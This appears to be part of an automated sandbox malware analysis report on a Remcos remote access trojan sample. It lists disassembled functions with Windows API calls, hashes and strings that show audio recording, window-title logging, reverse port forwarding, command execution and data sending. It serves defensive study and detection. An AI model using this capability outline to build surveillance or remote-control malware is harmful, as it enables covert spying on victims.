                                                                                • Instruction ID: aaf019a9b49167a30595a2ca3c371567d0eeee9026f0995440eeab6e66ec65be
                                                                                • Opcode Fuzzy Hash: 2c3f92f457844e41ff86450acd5aff28f03427e63226fad44709e0019a985647
                                                                                • Instruction Fuzzy Hash: 00118632901218AFD7116B64EC85DFF3FACDB45BA5B000036F502921D1DB64DD46AAF5
                                                                                Function 00446DCB Relevance: 15.1, APIs: 10, Instructions: 54COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • _free.LIBCMT ref: 00446DDF
                                                                                  • Part of subcall function 00446AC5: HeapFree.KERNEL32(00000000,00000000,?,0044FA50,?,00000000,?,00000000,?,0044FCF4,?,00000007,?,?,00450205,?), ref: 00446ADB
                                                                                  • Part of subcall function 00446AC5: GetLastError.KERNEL32(?,?,0044FA50,?,00000000,?,00000000,?,0044FCF4,?,00000007,?,?,00450205,?,?), ref: 00446AED
                                                                                • _free.LIBCMT ref: 00446DEB
                                                                                • _free.LIBCMT ref: 00446DF6
                                                                                • _free.LIBCMT ref: 00446E01
                                                                                • _free.LIBCMT ref: 00446E0C
                                                                                • _free.LIBCMT ref: 00446E17
                                                                                • _free.LIBCMT ref: 00446E22
                                                                                • _free.LIBCMT ref: 00446E2D
                                                                                • _free.LIBCMT ref: 00446E38
                                                                                • _free.LIBCMT ref: 00446E46
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4145931903.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.4145931903.0000000000473000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000006.00000002.4145931903.0000000000476000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: _free$ErrorFreeHeapLast
                                                                                • String ID:
                                                                                • API String ID: 776569668-0
                                                                                • Opcode ID: 97a3f4e44069bc11c8e401312368c96959fa26c4fc1008248271593ee2688753
                                                                                • Instruction ID: b6db37451886405a3c03f61b360184b61b1678451e8b30ee63348233c964278a
                                                                                • Opcode Fuzzy Hash: 97a3f4e44069bc11c8e401312368c96959fa26c4fc1008248271593ee2688753
                                                                                • Instruction Fuzzy Hash: F011E975100408BFEB01EF55C842CDD3B65EF46354B06C0AAF9086F222DA35DE649F85
                                                                                Function 007C7032 Relevance: 15.1, APIs: 10, Instructions: 54COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • _free.LIBCMT ref: 007C7046
                                                                                  • Part of subcall function 007C6D2C: HeapFree.KERNEL32(00000000,00000000,?,007CFCB7,?,00000000,?,00000000,?,007CFF5B,?,00000007,?,?,007D046C,?), ref: 007C6D42
                                                                                  • Part of subcall function 007C6D2C: GetLastError.KERNEL32(?,?,007CFCB7,?,00000000,?,00000000,?,007CFF5B,?,00000007,?,?,007D046C,?,?), ref: 007C6D54
                                                                                • _free.LIBCMT ref: 007C7052
                                                                                • _free.LIBCMT ref: 007C705D
                                                                                • _free.LIBCMT ref: 007C7068
                                                                                • _free.LIBCMT ref: 007C7073
                                                                                • _free.LIBCMT ref: 007C707E
                                                                                • _free.LIBCMT ref: 007C7089
                                                                                • _free.LIBCMT ref: 007C7094
                                                                                • _free.LIBCMT ref: 007C709F
                                                                                • _free.LIBCMT ref: 007C70AD
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4146476987.0000000000780000.00000040.00001000.00020000.00000000.sdmp, Offset: 00780000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_780000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: _free$ErrorFreeHeapLast
                                                                                • String ID:
                                                                                • API String ID: 776569668-0
                                                                                • Opcode ID: 97a3f4e44069bc11c8e401312368c96959fa26c4fc1008248271593ee2688753
                                                                                • Instruction ID: f1774bd9c448a454d5dbac9f49b1670e448fe3c27b450c84ff0c5e5e14f71ad4
                                                                                • Opcode Fuzzy Hash: 97a3f4e44069bc11c8e401312368c96959fa26c4fc1008248271593ee2688753
                                                                                • Instruction Fuzzy Hash: 35115376600108EFCF45EF64E886E993F76AF04350B5150A9B9098B122DA36EE50DB84
                                                                                Function 00791EE8 Relevance: 14.5, APIs: 4, Strings: 4, Instructions: 479fileCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00791F01
                                                                                  • Part of subcall function 0079AD9F: GetCurrentProcessId.KERNEL32(00000000,?,?,?,?,?,?,00783CA7), ref: 0079ADC6
                                                                                  • Part of subcall function 0079791D: CloseHandle.KERNEL32( =x$SF,?,?,00783D20,00465324), ref: 00797933
                                                                                  • Part of subcall function 0079791D: CloseHandle.KERNEL32(?,?,?,00783D20,00465324), ref: 0079793C
                                                                                • DeleteFileW.KERNEL32(00000000,00465324,00465324,00465324), ref: 007921F8
                                                                                • DeleteFileW.KERNEL32(00000000,00465324,00465324,00465324), ref: 0079222F
                                                                                • DeleteFileW.KERNEL32(00000000,00465324,00465324,00465324), ref: 0079226B
                                                                                  • Part of subcall function 007846CF: send.WS2_32(?,00000000,00000000,00000000), ref: 00784764
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4146476987.0000000000780000.00000040.00001000.00020000.00000000.sdmp, Offset: 00780000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_780000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: File$Delete$CloseHandle$CurrentModuleNameProcesssend
                                                                                • String ID: HDG$HDG$>G$>G
                                                                                • API String ID: 1937857116-1666402509
                                                                                • Opcode ID: 36ecec2bd287229840889fa2f21ce4d309759ff1e99f2e4f361d0ee51ee9b760
                                                                                • Instruction ID: 79fc5256e1c7ea99c901f9afdb27c3b3338215013eee592eed00e3daddb95b8e
                                                                                • Opcode Fuzzy Hash: 36ecec2bd287229840889fa2f21ce4d309759ff1e99f2e4f361d0ee51ee9b760
                                                                                • Instruction Fuzzy Hash: 6A02443168C340DEC729FB24D869BEEB3D5AF94301F50482DF58A86193EE785A4BC752
                                                                                Function 00410314 Relevance: 14.2, APIs: 2, Strings: 6, Instructions: 192COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4145931903.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.4145931903.0000000000473000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000006.00000002.4145931903.0000000000476000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Eventinet_ntoa
                                                                                • String ID: GetDirectListeningPort$StartForward$StartReverse$StopForward$StopReverse$>G
                                                                                • API String ID: 3578746661-4192532303
                                                                                • Opcode ID: 93c84ebb9a645676f6df3c0e1a8f241db98c5f09e9be4a3df439d358246397e7
                                                                                • Instruction ID: 9533851bb4e74ac183efc1d320b4a1154e984465ef7073577260c431c5a81f81
                                                                                • Opcode Fuzzy Hash: 93c84ebb9a645676f6df3c0e1a8f241db98c5f09e9be4a3df439d358246397e7
                                                                                • Instruction Fuzzy Hash: E8518471A042009BC714F779D85AAAE36A59B80318F40453FF849972E2DF7CAD85CB9F
                                                                                Function 0079057B Relevance: 14.2, APIs: 2, Strings: 6, Instructions: 192COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4146476987.0000000000780000.00000040.00001000.00020000.00000000.sdmp, Offset: 00780000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_780000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Eventinet_ntoa
                                                                                • String ID: GetDirectListeningPort$StartForward$StartReverse$StopForward$StopReverse$>G
                                                                                • API String ID: 3578746661-4192532303
                                                                                • Opcode ID: a0049f2f09a357c7da3f2da1302c44ceee5b7892c88a4f25036bd0ddf1a9f3a7
                                                                                • Instruction ID: 4b94e649ba30769429e3fc1096c739f67d765c573cc7de391c790fe0cff880b3
                                                                                • Opcode Fuzzy Hash: a0049f2f09a357c7da3f2da1302c44ceee5b7892c88a4f25036bd0ddf1a9f3a7
                                                                                • Instruction Fuzzy Hash: F151A631A542009FCB14F778E95E66E76A5AB81310F404529F506872E2EF3CAE46CBD6
                                                                                Function 0079A422 Relevance: 14.2, APIs: 6, Strings: 2, Instructions: 180synchronizationCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • mciSendStringW.WINMM(00000000,00000000,00000000,00000000), ref: 0079A519
                                                                                • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,000000A9,00465554), ref: 0079A555
                                                                                • PathFileExistsW.SHLWAPI(00000000,00000000,00000000,?,00000000), ref: 0079A566
                                                                                • SetEvent.KERNEL32 ref: 0079A5F1
                                                                                • WaitForSingleObject.KERNEL32(000001F4), ref: 0079A602
                                                                                • CloseHandle.KERNEL32 ref: 0079A612
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4146476987.0000000000780000.00000040.00001000.00020000.00000000.sdmp, Offset: 00780000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_780000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Event$CloseCreateExistsFileHandleObjectPathSendSingleStringWait
                                                                                • String ID: TUF$open "
                                                                                • API String ID: 1811012380-2979349893
                                                                                • Opcode ID: afa000e900512d794b59872f8fe6b6e7421b33da501b9bd85e28326864c8fc87
                                                                                • Instruction ID: 1d3a0e6bfc5d9dde327b5f549d13de2f1c54c7be39c984fe613b4fde38d6e755
                                                                                • Opcode Fuzzy Hash: afa000e900512d794b59872f8fe6b6e7421b33da501b9bd85e28326864c8fc87
                                                                                • Instruction Fuzzy Hash: 2D51B171244305BED614BB24EC8AEBF3B5CDB81755F10002AF045921A2EE699D49C7A7
                                                                                Function 0078A65B Relevance: 14.2, APIs: 6, Strings: 2, Instructions: 158sleepCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • __Init_thread_footer.LIBCMT ref: 0078A6BD
                                                                                • Sleep.KERNEL32(000001F4), ref: 0078A6C8
                                                                                • GetForegroundWindow.USER32 ref: 0078A6CE
                                                                                • GetWindowTextLengthW.USER32(00000000), ref: 0078A6D7
                                                                                • GetWindowTextW.USER32(00000000,00000000,00000000), ref: 0078A70B
                                                                                • Sleep.KERNEL32(000003E8), ref: 0078A7DB
                                                                                  • Part of subcall function 00789FBF: SetEvent.KERNEL32(00000000,?,00000000,0078AB83,00000000), ref: 00789FEB
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4146476987.0000000000780000.00000040.00001000.00020000.00000000.sdmp, Offset: 00780000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_780000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Window$SleepText$EventForegroundInit_thread_footerLength
                                                                                • String ID: [${ User has been idle for
                                                                                • API String ID: 911427763-3934435721
                                                                                • Opcode ID: 6d776f70f920023e5288755160ba8f24f5da9fa6db96a00e1421ea32c0579234
                                                                                • Instruction ID: 369146a281ae15b4e75bc2685a2892f1449d179550295cfc96995b0b3a0d0242
                                                                                • Opcode Fuzzy Hash: 6d776f70f920023e5288755160ba8f24f5da9fa6db96a00e1421ea32c0579234
                                                                                • Instruction Fuzzy Hash: 2551E431688600EBD714FB30D84EB6EB3A5AB84710F54052EF446861D2EF6C9A46C797
                                                                                Function 00455139 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 154COMMONLIBRARYCODE
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • DecodePointer.KERNEL32(?,?,?,?,?,?,?,?,?,?,00455DAF), ref: 0045515C
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4145931903.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.4145931903.0000000000473000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000006.00000002.4145931903.0000000000476000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: DecodePointer
                                                                                • String ID: acos$asin$exp$log$log10$pow$sqrt
                                                                                • API String ID: 3527080286-3064271455
                                                                                • Opcode ID: ab61d69453e4831c81f6a46e39f254611e12c2bb616dca0b6d42b24218e76fcf
                                                                                • Instruction ID: 89d0c260ad138193cc60bb845925db7455dcb75d1c4d79333749f45855522aa5
                                                                                • Opcode Fuzzy Hash: ab61d69453e4831c81f6a46e39f254611e12c2bb616dca0b6d42b24218e76fcf
                                                                                • Instruction Fuzzy Hash: DA516D70900E09CBCF14DF99E9581BDBBB0FB09342F244297EC41A6266CB798A1DCB1D
                                                                                Function 00401768 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 142threadCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • ExitThread.KERNEL32 ref: 004017F4
                                                                                  • Part of subcall function 00433519: EnterCriticalSection.KERNEL32(00470D18,?,00475D2C,?,0040AE8B,00475D2C,?,00000000,00000000), ref: 00433524
                                                                                  • Part of subcall function 00433519: LeaveCriticalSection.KERNEL32(00470D18,?,0040AE8B,00475D2C,?,00000000,00000000), ref: 00433561
                                                                                • waveInUnprepareHeader.WINMM(?,00000020,00000000,?,00000020,00473EE8,00000000), ref: 00401902
                                                                                  • Part of subcall function 004338A5: __onexit.LIBCMT ref: 004338AB
                                                                                • __Init_thread_footer.LIBCMT ref: 004017BC
                                                                                  • Part of subcall function 004334CF: EnterCriticalSection.KERNEL32(00470D18,00475D2C,?,0040AEAC,00475D2C,00456D97,?,00000000,00000000), ref: 004334D9
                                                                                  • Part of subcall function 004334CF: LeaveCriticalSection.KERNEL32(00470D18,?,0040AEAC,00475D2C,00456D97,?,00000000,00000000), ref: 0043350C
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4145931903.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.4145931903.0000000000473000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000006.00000002.4145931903.0000000000476000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CriticalSection$EnterLeave$ExitHeaderInit_thread_footerThreadUnprepare__onexitwave
                                                                                • String ID: @Ej$`i$p[G$>G$>G
                                                                                • API String ID: 1596592924-727027245
                                                                                • Opcode ID: 09dd6f417f069e8ed8ecd5ad6d96cd9979ca59fa008c26f0b929756245c9fa86
                                                                                • Instruction ID: b2aa677fe1363808454ef9d3704f93b9908b7cd688e3fd59dcdd6ad405d7ff49
                                                                                • Opcode Fuzzy Hash: 09dd6f417f069e8ed8ecd5ad6d96cd9979ca59fa008c26f0b929756245c9fa86
                                                                                • Instruction Fuzzy Hash: 0D41A0316042019BC324FB65DCA6EAE73A4EB94318F00453FF54AA71F2DF78A945C65E
                                                                                Function 004165FC Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 103sleepfileCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • ShellExecuteW.SHELL32(00000000,open,dxdiag,00000000,00000000,00000000), ref: 0041665C
                                                                                  • Part of subcall function 0041B61A: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,00409F65), ref: 0041B633
                                                                                • Sleep.KERNEL32(00000064), ref: 00416688
                                                                                • DeleteFileW.KERNEL32(00000000), ref: 004166BC
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4145931903.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.4145931903.0000000000473000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000006.00000002.4145931903.0000000000476000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: File$CreateDeleteExecuteShellSleep
                                                                                • String ID: /t $\sysinfo.txt$dxdiag$open$temp
                                                                                • API String ID: 1462127192-2001430897
                                                                                • Opcode ID: 2bb4d90de0affc035aef4a41157309109bec975f88e9ed3d6ac6d43f2603e6ee
                                                                                • Instruction ID: 72b86f905f1643b809cd09d25b02ba286255726e8958c1b91c3bd62dba73c542
                                                                                • Opcode Fuzzy Hash: 2bb4d90de0affc035aef4a41157309109bec975f88e9ed3d6ac6d43f2603e6ee
                                                                                • Instruction Fuzzy Hash: FD313E719001085ADB14FBA1DC96EEE7764AF50708F00013FF906731E2EF786A8ACA9D
                                                                                Function 0079708B Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 102filesynchronizationCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • WaitForSingleObject.KERNEL32(00000000,000000FF,00000070,00465554), ref: 0079718B
                                                                                • CloseHandle.KERNEL32(00000000), ref: 00797194
                                                                                • DeleteFileA.KERNEL32(00000000), ref: 007971A3
                                                                                • ShellExecuteEx.SHELL32(0000003C), ref: 00797157
                                                                                  • Part of subcall function 007846CF: send.WS2_32(?,00000000,00000000,00000000), ref: 00784764
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4146476987.0000000000780000.00000040.00001000.00020000.00000000.sdmp, Offset: 00780000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_780000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CloseDeleteExecuteFileHandleObjectShellSingleWaitsend
                                                                                • String ID: <$@$@FG$TUF
                                                                                • API String ID: 1107811701-3349172182
                                                                                • Opcode ID: b36bc87eb4507af4992a544fbd13103342267bc18c2cc7e8b00c7cda52f17d37
                                                                                • Instruction ID: 9b02d7f07c480ea233464e0b5e7a177df9a104a00d35065e1d943c52fe9e99c6
                                                                                • Opcode Fuzzy Hash: b36bc87eb4507af4992a544fbd13103342267bc18c2cc7e8b00c7cda52f17d37
                                                                                • Instruction Fuzzy Hash: 8E318F31D80209DBCF19FBA4DC5EAEE7734AF50351F104169F506A60E2EF785A8ACB90
                                                                                Function 00401A8E Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 89COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • _strftime.LIBCMT ref: 00401AD3
                                                                                  • Part of subcall function 00401BE8: CreateFileW.KERNEL32(00000000,40000000,00000000), ref: 00401C54
                                                                                • waveInUnprepareHeader.WINMM(00471AC0,00000020,00000000,?), ref: 00401B85
                                                                                • waveInPrepareHeader.WINMM(00471AC0,00000020), ref: 00401BC3
                                                                                • waveInAddBuffer.WINMM(00471AC0,00000020), ref: 00401BD2
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4145931903.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.4145931903.0000000000473000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000006.00000002.4145931903.0000000000476000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: wave$Header$BufferCreateFilePrepareUnprepare_strftime
                                                                                • String ID: %Y-%m-%d %H.%M$.wav$`=G$x=G
                                                                                • API String ID: 3809562944-3643129801
                                                                                • Opcode ID: ede8590fc8086e975146c5212d36a2775eef56bc05a02da711b3603456504e00
                                                                                • Instruction ID: ec6e8c75c27496dd15f6dcc160753dc5291fcfbcfc36b55cd818fae73feeac55
                                                                                • Opcode Fuzzy Hash: ede8590fc8086e975146c5212d36a2775eef56bc05a02da711b3603456504e00
                                                                                • Instruction Fuzzy Hash: 6C317E315053009BC314EF25DC56A9E77E8BB94314F00883EF559A21F1EF78AA49CB9A
                                                                                Function 0040196B Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 72COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 0040197B
                                                                                • waveInOpen.WINMM(00471AF8,000000FF,00471B00,Function_00001A8E,00000000,00000000,00000024), ref: 00401A11
                                                                                • waveInPrepareHeader.WINMM(00471AC0,00000020,00000000), ref: 00401A66
                                                                                • waveInAddBuffer.WINMM(00471AC0,00000020), ref: 00401A75
                                                                                • waveInStart.WINMM ref: 00401A81
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4145931903.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.4145931903.0000000000473000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000006.00000002.4145931903.0000000000476000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: wave$BufferCreateDirectoryHeaderOpenPrepareStart
                                                                                • String ID: XCG$`=G$x=G
                                                                                • API String ID: 1356121797-903574159
                                                                                • Opcode ID: df66b5dce40286873da021395106849cc9c08a1aee5ad096444ea0181d895aab
                                                                                • Instruction ID: 1c4952ee711c82e1d68262a7885cb64ec938acb60d992cd4a46dee1db52e037b
                                                                                • Opcode Fuzzy Hash: df66b5dce40286873da021395106849cc9c08a1aee5ad096444ea0181d895aab
                                                                                • Instruction Fuzzy Hash: 87215C316012009BC704DF7EFD1696A7BA9FB85742B00843AF50DE76B0EBB89880CB4C
                                                                                Function 00781BD2 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 72COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 00781BE2
                                                                                • waveInOpen.WINMM(00471AF8,000000FF,00471B00,00401A8E,00000000,00000000,00000024), ref: 00781C78
                                                                                • waveInPrepareHeader.WINMM(00471AC0,00000020,00000000), ref: 00781CCD
                                                                                • waveInAddBuffer.WINMM(00471AC0,00000020), ref: 00781CDC
                                                                                • waveInStart.WINMM ref: 00781CE8
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4146476987.0000000000780000.00000040.00001000.00020000.00000000.sdmp, Offset: 00780000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_780000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: wave$BufferCreateDirectoryHeaderOpenPrepareStart
                                                                                • String ID: XCG$`=G$x=G
                                                                                • API String ID: 1356121797-903574159
                                                                                • Opcode ID: 4fec801bf293db6df151fde61eeb5f786b1727cfb1468d64e42c9e242be372bd
                                                                                • Instruction ID: 093c2fadb85cdcdcc31d40dd9181f95da632ff02148359bb238c145ed9fafe4f
                                                                                • Opcode Fuzzy Hash: 4fec801bf293db6df151fde61eeb5f786b1727cfb1468d64e42c9e242be372bd
                                                                                • Instruction Fuzzy Hash: 93216231A41301DBC714DF6DBD1995A7BA9FB84752B00943AF11DD76B1EB789481CB0C
                                                                                Function 0041C96F Relevance: 14.0, APIs: 7, Strings: 1, Instructions: 47windowstringCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 0041C988
                                                                                  • Part of subcall function 0041CA1F: RegisterClassExA.USER32(00000030), ref: 0041CA6C
                                                                                  • Part of subcall function 0041CA1F: CreateWindowExA.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,000000FD,00000000,00000000,00000000), ref: 0041CA87
                                                                                  • Part of subcall function 0041CA1F: GetLastError.KERNEL32 ref: 0041CA91
                                                                                • ExtractIconA.SHELL32(00000000,?,00000000), ref: 0041C9BF
                                                                                • lstrcpynA.KERNEL32(00473B68,Remcos,00000080), ref: 0041C9D9
                                                                                • Shell_NotifyIconA.SHELL32(00000000,00473B50), ref: 0041C9EF
                                                                                • TranslateMessage.USER32(?), ref: 0041C9FB
                                                                                • DispatchMessageA.USER32(?), ref: 0041CA05
                                                                                • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 0041CA12
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4145931903.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.4145931903.0000000000473000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000006.00000002.4145931903.0000000000476000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Message$Icon$ClassCreateDispatchErrorExtractFileLastModuleNameNotifyRegisterShell_TranslateWindowlstrcpyn
                                                                                • String ID: Remcos
                                                                                • API String ID: 1970332568-165870891
                                                                                • Opcode ID: 3916a83a2764b610bd39468394578f6b6e569060e520b3e5816c6a16bad35c1f
                                                                                • Instruction ID: 0af2178feff80faf092f0d4c6bffee9b758878d1eb04e36c9ad6546aee081b39
                                                                                • Opcode Fuzzy Hash: 3916a83a2764b610bd39468394578f6b6e569060e520b3e5816c6a16bad35c1f
                                                                                • Instruction Fuzzy Hash: 760121B1944344ABD7109FA5FC4CEDA7BBCAB45B16F004035F605E2162D7B8A285DB2D
                                                                                Function 0044B450 Relevance: 13.8, APIs: 9, Instructions: 300COMMONLIBRARYCODE
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4145931903.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.4145931903.0000000000473000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000006.00000002.4145931903.0000000000476000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: fcc2c2816786db3331fe4fa4cc48332b155136c474820dd8e562c8cdfa0ddddc
                                                                                • Instruction ID: 1e235cce983953b2f50cc3566bc78ab2d8216d31b9fa4c429b6f00869d8f9d70
                                                                                • Opcode Fuzzy Hash: fcc2c2816786db3331fe4fa4cc48332b155136c474820dd8e562c8cdfa0ddddc
                                                                                • Instruction Fuzzy Hash: 27C1D774D04249AFEF11DFA9C8417AEBBB4FF4A304F14405AE814A7392C778D941CBA9
                                                                                Function 007CB6B7 Relevance: 13.8, APIs: 9, Instructions: 300COMMONLIBRARYCODE
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4146476987.0000000000780000.00000040.00001000.00020000.00000000.sdmp, Offset: 00780000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_780000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: b50f87e948356266a42ac280b2451f101745a062afa0556d4abdae292072cfe6
                                                                                • Instruction ID: 334901b5c5796fba8a1c91174548f6052ef51c08e333633c204c72b3cde25bef
                                                                                • Opcode Fuzzy Hash: b50f87e948356266a42ac280b2451f101745a062afa0556d4abdae292072cfe6
                                                                                • Instruction Fuzzy Hash: 26C1CF70E04249EFCF119FA8D886FADBBB5AF4A310F14409DF945A7392C739A941CB61
                                                                                Function 00452B2A Relevance: 13.8, APIs: 9, Instructions: 268COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetCPInfo.KERNEL32(?,?), ref: 00452BD6
                                                                                • MultiByteToWideChar.KERNEL32(?,00000009,?,?,00000000,00000000), ref: 00452C59
                                                                                • __alloca_probe_16.LIBCMT ref: 00452C91
                                                                                • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00452CEC
                                                                                • __alloca_probe_16.LIBCMT ref: 00452D3B
                                                                                • MultiByteToWideChar.KERNEL32(?,00000009,?,?,00000000,00000000), ref: 00452D03
